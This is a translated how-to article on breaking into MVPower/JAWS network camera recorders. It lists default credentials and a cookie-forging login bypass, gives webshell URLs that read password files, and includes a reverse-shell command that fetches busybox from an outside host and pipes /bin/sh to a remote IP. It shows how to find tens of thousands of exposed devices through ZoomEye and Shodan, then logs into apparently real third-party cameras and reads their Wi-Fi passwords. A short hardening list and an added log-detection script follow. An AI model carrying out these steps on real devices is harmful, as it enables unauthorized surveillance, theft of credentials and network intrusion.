Popularization and Application of Zoomeye penetration Network Camera

Source: Internet
Author: User


Network cameras (IP cameras) are becoming more and more common in daily life: they capture license plate numbers at intersections, monitor children in kindergartens and drive residential license plate recognition systems. These cameras are connected to computers, video recorders and other hardware for image storage and real-time viewing, and many are also connected directly to the network so that they can be managed and viewed through a browser or client. The vendor's intention is to make viewing video easier for users, but many network cameras pay too little attention to security. An attacker can easily reach and browse a vulnerable camera by technical means, in some cases obtain the permissions of the server the camera sits on, and even penetrate the network the camera is located in, which is very harmful.
I. Vulnerability Analysis
Andrew Tierney posted an article on exploiting camera vulnerabilities on his blog (https://www.pentestpartners.com/blog/pwning-cctv-cameras/). Its core points are summarized as follows:
1. Weak password vulnerability
The device, referred to as "CCTV" for short, is the Mvpower 8 Channel Security DVR Full D1 H.264 CCTV Real-time Network Digital Video Recorder Mobile Motion Detection, P2P HDMI Alarm Email for CCTV Surveillance Cameras System sold on Amazon. The default passwords collected for other network cameras are as follows:
(1) Hikvision IP network camera: super user admin, super user password 12345.
(2) Dahua network camera: user name admin, password 888888.
(3) Tiandiweiye network camera: user name Admin, password 111111.
2. Logon password bypass vulnerability
After logging on with the default password, we can capture the packets of the page, locate the JavaScript that handles the logon logic, and analyze it. A logon bypass vulnerability exists; the code is as follows:
$(document).ready(function () {
    dvr_camcnt = Cookies.get("dvr_camcnt");
    iSetAble = Cookies.get("iSetAble");
    iPlayBack = Cookies.get("iPlayBack");
    dvr_usr = Cookies.get("dvr_usr");
    dvr_pwd = Cookies.get("dvr_pwd");
    if (iSetAble == '0') {
        $('#pb_settings').css('display', 'none');
    }
    if (iPlayBack == '0') {
        $('#pb_review').css('display', 'none');
    }
    if (dvr_camcnt == null || dvr_usr == null || dvr_pwd == null) {
        location.href = "/index.html";
    }
});
The system management page checks only, in JavaScript, whether the cookies are empty to decide whether the user is logged on; some programmers still write logon-state checks this way. Therefore the logon check can be bypassed by forging the cookies. The code shows that three cookie values need to be forged: dvr_camcnt, dvr_usr and dvr_pwd, for example dvr_usr = admin and dvr_pwd = 123. dvr_usr and dvr_pwd can be set to any value as long as they are not empty, as shown in Figure 1. After saving the cookies, refresh http://xx.xx.xx.xx/view2.html to enter the system management page directly.

Figure 1 Password Bypass Vulnerability
3. Directly obtain a webshell and the root password
Accessing http://www.antian365.com/shell?cat /etc/passwd directly returns the server's /etc/passwd, and with it the root account's password hash, as shown in Figure 2. The root account's password hash is a03e3thxwWU0g; the plaintext is "juantech".

Figure 2 Obtaining a webshell
4. Obtain a reverse shell
Run the following command:
cd /root/rec/a1 && wget http://212.111.43.161/busybox && chmod +x busybox && ./busybox nc 122.115.47.39 8000 -e /bin/sh
The shell is bounced back to port 8000 of 122.115.47.39. Alternatively, execute http://www.antian365.com/shell?/usr/sbin/telnetd -l /bin/sh -p 25 and then enter the system directly by connecting to the target IP address with telnet.
II. Practical drills
Using the vulnerability analysis above, we can test a CCTV network camera that actually has the vulnerability, to verify that the vulnerability is real and master how it is exploited.
1. Determine the CCTV network camera keyword "JAWS"
Run bannergrab in Kali Linux and enter the device's IP address and web port; the banner grab result is shown in Figure 3. The keyword is the Server string "JAWS".

Figure 3 Obtaining the keyword
2. Quickly obtain target servers
In this example ZoomEye is used for retrieval: open https://www.zoomeye.org/search?q=JAWS to query directly. Shodan can also be used (https://www.shodan.io/search?query=JAWS%2F1.0). Figure 4 shows that about 37,726 results are found, on 34,263 hosts (0.096 seconds).


Figure 4 Searching for the keyword "JAWS"
3. Randomly access a target
Pick a result at random from the search results. Open http://223.20.146.74/, enter the user name admin and the default password, and you log on to the system directly, as shown in Figure 5; the monitored room and screen can be viewed.

Figure 5 Access permissions
4. Directly obtain the access password
The command "shell?cat%20/tmp/usrm.ini" can be used to obtain the access password directly, for example http://210.21.34.206/shell?cat%20/tmp/usrm.ini. The default administrator password is blank, as shown in Figure 6 and Figure 7. After the default password is modified and the device is accessed again, the new password has been written in plaintext to the /tmp/usrm.ini file.

Figure 6 Obtaining the administrator password

Figure 7 The modified password is saved in plaintext
5. Obtain the wireless network password
The wireless AP name and password can be read directly from the network settings, as shown in Figure 8.
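As an added example (not part of the original article), the detector below shows how the webshell abuse described in sections 3 and 4 above, requests to the device's "shell?" endpoint reading /etc/passwd and /tmp/usrm.ini, can be spotted in an access log from the device, a reverse proxy or a monitoring sensor in front of it. The log lines are constructed for the demonstration and follow the common "combined" web log layout, which is an assumption; the DVR's own log format is not described in the article.

```javascript
// Added example, not from the original article: flag requests to the DVR's
// 'shell?' endpoint in an access log. The log lines are constructed and the
// combined-log field layout is an assumption; the paths and payload fragments
// are the ones the article itself describes.
const SUSPICIOUS_PATHS = ['/shell'];
const SUSPICIOUS_FRAGMENTS = ['/etc/passwd', '/tmp/usrm.ini', 'telnetd', 'busybox', '/bin/sh'];

// ip ident user [time] "METHOD target PROTO" status size
const LOG_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\d+|-)/;

function parseLogLine(line) {
  const m = LOG_RE.exec(line);
  if (!m) return null;
  return { ip: m[1], time: m[2], method: m[3], target: m[4], status: Number(m[5]) };
}

// Return the list of reasons a request looks like use of the command endpoint
// (empty list means nothing suspicious).
function classifyRequest(req) {
  let decoded;
  try {
    decoded = decodeURIComponent(req.target);
  } catch (e) {
    decoded = req.target; // malformed percent-encoding: inspect the raw target
  }
  const path = decoded.split('?', 1)[0];
  const reasons = [];
  if (SUSPICIOUS_PATHS.includes(path)) reasons.push('command endpoint');
  for (const frag of SUSPICIOUS_FRAGMENTS) {
    if (decoded.includes(frag)) reasons.push(`payload mentions ${frag}`);
  }
  return reasons;
}

function scanLog(lines) {
  const alerts = [];
  for (const line of lines) {
    const req = parseLogLine(line);
    if (!req) continue;
    const reasons = classifyRequest(req);
    if (reasons.length) alerts.push({ ip: req.ip, target: req.target, status: req.status, reasons });
  }
  return alerts;
}

// Constructed sample log: one normal session and two reads through 'shell?'.
const SAMPLE_LOG = [
  '198.51.100.7 - - [10/Oct/2016:13:55:36 +0000] "GET /view2.html HTTP/1.1" 200 5123',
  '198.51.100.7 - - [10/Oct/2016:13:55:40 +0000] "GET /shell?cat%20/etc/passwd HTTP/1.1" 200 1034',
  '198.51.100.7 - - [10/Oct/2016:13:55:45 +0000] "GET /shell?cat%20/tmp/usrm.ini HTTP/1.1" 200 211',
  '203.0.113.9 - - [10/Oct/2016:14:01:02 +0000] "GET /index.html HTTP/1.1" 200 2210',
];

for (const alert of scanLog(SAMPLE_LOG)) console.log(alert);
```

A 200 status on a "shell?" request is the signal worth paging on: it means the endpoint is reachable and answered, so the device should be taken off the network and its administrator and Wi-Fi passwords changed.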

6. Reverse shell testing
Reverse shell tests were performed on some targets. Not all of them succeed, as the target may not have write permission. Downloading the http://212.111.43.161/busybox file takes about 100 MB.
III. Preventive measures and suggestions
Malicious programs exploiting this are already active on the Internet, but no patch has been released. The following measures can be taken to harden the device:
1. Change the default root password to a strong one.
2. Do not expose the device to external access; alternatively, change the default access path to a hard-to-guess name so that the default address cannot be reached.
3. Strictly restrict write access on the server.
4. Change the default admin password.